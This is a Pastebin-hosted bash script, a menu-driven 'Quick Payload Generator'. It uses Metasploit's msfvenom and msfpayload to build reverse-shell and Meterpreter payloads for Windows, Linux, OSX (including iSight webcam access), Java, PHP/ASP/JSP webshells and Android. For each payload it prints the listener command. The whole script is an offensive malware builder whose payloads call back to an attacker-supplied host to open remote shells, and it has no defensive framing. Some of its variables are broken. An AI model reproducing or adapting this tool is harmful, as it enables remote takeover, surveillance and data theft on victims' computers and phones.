Advertisement
Guest User

test mod

a guest
Nov 20th, 2019
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 8.91 KB | None | 0 0
  1.  
  2. #!/bin/bash
  3. #
  4.  
  5. echo "Quick Payload Generator"
  6. echo "Version 4.0.5, Alpha E"
  7. echo "Ready..."
  8. echo ">access security"
  9. echo "access: PERMISSION DENIED."
  10. echo ">access security grid"
  11. echo "access: PERMISSION DENIED."
  12. echo ">access main security grid"
  13. echo "access: PERMISSION DENIED....and..."
  14. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  15. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  16. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  17. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  18. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  19. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  20. echo "YOU DIDN'T SAY THE MAGIC WORD!"
  21.  
  22.  
  23. echo -e "\033[33;5mEnter Your IP Address\033[0m"
  24. echo -n "address: "
  25. read address
  26.  
  27. echo -e "\033[33;5mEnter Port To Use\033[0m"
  28. echo -n "port: "
  29. read port
  30.  
  31. echo -e "\033[33;5mEnter Payload Name\033[0m"
  32. echo -n "pkg: "
  33. read pkg
  34.  
  35. while true; do
  36. read -p "Select Payload Type
  37. ========================
  38. 1 for Windows Payload
  39. 2 for Linux Payload
  40. 3 for Apple OSX Payload
  41. 4 for Java Payload
  42. 5 for Webshell
  43. 6 for Android Payload
  44. q to quit" 123456q
  45. case $123456q in
  46. [1]* ) while true; do
  47. read -p "Windows Payload Menu
  48. ==================================
  49. 10 Windows Meterpreter Reverse Tcp
  50. 11 Windows Shell Reverse_TCP
  51. 12 Payload using msfvenom
  52. 13 Custom Shell Code
  53. q quit" 1234q
  54. case $1234q in
  55. [1]* ) ./cmd/quick/win.sh windows/meterpreter/reverse_tcp $address $port $pkg exploits/$pkg.exe
  56. chmod +x exploits/$pkg.exe
  57. echo "To start listener copy and paste this code in to your terminal"
  58. echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  59. sleep 3; break;;
  60. [2]* ) ./cmd/quick/win.sh windows/shell_reverse_tcp $address $port $pkg exploits/$pkg.exe
  61. chmod +x exploits/$pkg.exe
  62. echo "To start listener copy and paste this code in to your terminal"
  63. echo "msfcli exploit/multi/handler PAYLOAD=windows/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  64. sleep 3; break;;
  65. [3]* ) msfvenom -p windows/meterpreter/reverse_tcp LHOST=$address LPORT=$port EXITFUNC=thread -a x86 -e x86/shikata_ga_nai 40 -f exe>exploits/$pkg.exe
  66. chmod +x exploits/$pkg.exe
  67. echo "To start listener copy and paste this code in to your terminal"
  68. echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  69. sleep 3; break;;
  70. [4]* ) ./cmd/quick/shellcode.sh $ip $port exploits/$pkg.exe
  71. chmod +x exploits/$pkg.exe
  72. echo "To start listener copy and paste this code in to your terminal"
  73. echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  74. sleep 3; break;;
  75. [q]* ) break;;
  76. * ) echo "answer 1 2 3 4 q.";;
  77. esac
  78. done
  79.  
  80. [2]* ) while true; do
  81. read -p "Linux Payload Menu
  82. ==================================
  83. 1 Linux x86 Meterpreter Reverse Tcp
  84. 2 Linux x86 shell reverse_tcp
  85. q quit " 12q
  86. case $12q in
  87. [1]* ) ./cmd/quick/linux.sh linux/x86/meterpreter/reverse_tcp $address $port exploits/$pkg
  88. chmod +x exploits/$pkg
  89. echo "To start listener copy and paste this code in to your terminal"
  90. echo "msfcli exploit/multi/handler PAYLOAD=linux/x86/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  91. sleep 3; break;;
  92. [2]* ) ./cmd/quick/linux.sh linux/x86/shell_reverse_tcp $address $port exploits/$pkg
  93. chmod +x exploits/$pkg
  94. echo "To start listener copy and paste this code in to your terminal"
  95. echo "msfcli exploit/multi/handler PAYLOAD=linux/x86/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  96. sleep 3; break;;
  97. [q]* ) break;;
  98. * ) echo "answer 1 2 q.";;
  99. esac
  100. done
  101.  
  102. [3]* ) while true; do
  103. read -p "Apple OSX Payload Menu
  104. ==================================
  105. 1 OSX Reverse TCP
  106. 2 OSX Isight bind_tcp
  107. q quit" 12q
  108. case $12q in
  109. [1]* ) msfpayload osx/x86/shell_reverse_tcp LHOST=$address LPORT=$port x>exploits/$pkg.pkg
  110. chmod 755 exploits/$pkg.pkg
  111. echo "To start listener copy and paste this code in to your terminal"
  112. echo "msfcli exploit/multi/handler PAYLOAD=osx/x86/shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  113. sleep 3; break;;
  114. [2]* ) msfpayload osx/x86/isight/bind_tcp LHOST=$address LPORT=$port x>exploits/$pkg.pkg
  115. chmod 755 exploits/$pkg.pkg
  116. echo "To start listener copy and paste this code in to your terminal"
  117. echo "msfcli exploit/multi/handler PAYLOAD=osx/x86/isight/bind_tcp LHOST='.$address.' LPORT='.$port.' E"
  118. sleep 3; break;;
  119. [q]* ) break;;
  120. * ) echo "answer 1 2 q.";;
  121. esac
  122. done
  123.  
  124. [4]* ) while true; do
  125. read -p "Java Payload Menu
  126. ==================================
  127. 1 Java meterpreter reverse_tcp
  128. 2 Java shell reverse_tcp
  129. 3 Java shell bind_tcp
  130. q quit" 123q
  131. case $123q in
  132. [1]* ) msfpayload java/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
  133. chmod 777 exploits/$pkg.jar
  134. echo "To start listener copy and paste this code in to your terminal"
  135. echo "msfcli exploit/multi/handler PAYLOAD=java/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  136. sleep 3; break;;
  137. [2]* ) msfpayload java/shell/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
  138. chmod 777 exploits/$pkg.jar
  139. echo "To start listener copy and paste this code in to your terminal"
  140. echo "msfcli exploit/multi/handler PAYLOAD=java/shell/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  141. sleep 3; break;;
  142. [3]* ) msfpayload java/shell/bind_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jar
  143. chmod 777 exploits/$pkg.jar
  144. echo "To start listener copy and paste this code in to your terminal"
  145. echo "msfcli exploit/multi/handler PAYLOAD=java/shell/bind_tcp LHOST='.$address.' LPORT='.$port.' E"
  146. sleep 3; break;;
  147. [q]* ) break;;
  148. * ) echo "answer 1 2 3 q.";;
  149. esac
  150. done
  151.  
  152. [5]* ) while true; do
  153. read -p "Webshell Payload Menu
  154. ==================================
  155. 1 PHP Meterpreter Reverse_tcp
  156. 2 ASP Page with metasploit payload
  157. 3 Java JSP Command Shell, Reverse TCP Inline
  158. q quit" 123q
  159. case $123q in
  160. [1]* ) msfpayload php/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.php
  161. echo "To start listener copy and paste this code in to your terminal"
  162. echo "msfcli exploit/multi/handler PAYLOAD=php/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  163. sleep 3; break;;
  164. [2]* ) ./cmd/quick/asp.sh $ip $port exploits/$pkg.asp
  165. chmod 755 exploits/$pkg.asp
  166. echo " To start listener copy and paste this code in to your terminal"
  167. echo "msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  168. sleep 3; break;;
  169. [3]* ) msfpayload java/jsp_shell_reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.jsp
  170. chmod 755 exploits/$pkg.jsp
  171. echo "To start listener copy and paste this code in to your terminal"
  172. echo "msfcli exploit/multi/handler PAYLOAD=java/jsp_shell_reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  173. sleep 3; break;;
  174. [q]* ) break;;
  175. * ) echo "answer 1 2 3 q.";;
  176. esac
  177. done
  178.  
  179. [6]* ) while true; do
  180. read -p "Android Payload Menu
  181. ==================================
  182. 1 Android Meterpreter
  183. q quit" 1q
  184. case $1q in
  185. [1]* ) msfpayload android/meterpreter/reverse_tcp LHOST=$address LPORT=$port R >exploits/$pkg.apk
  186. chmod +x exploits/$pkg.apk
  187. echo "To start listener copy and paste this code in to your terminal"
  188. echo "msfcli multi/handler PAYLOAD=android/meterpreter/reverse_tcp LHOST='.$address.' LPORT='.$port.' E"
  189. sleep 3; break;;
  190. [q]* ) break;;
  191. * ) echo "answer 1 q.";;
  192. esac
  193. done
  194.  
  195. [q]* ) exit;;
  196. * ) echo "answer 1 2 3 4 5 6 q.";;
  197. esac
  198. done
  199. #exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement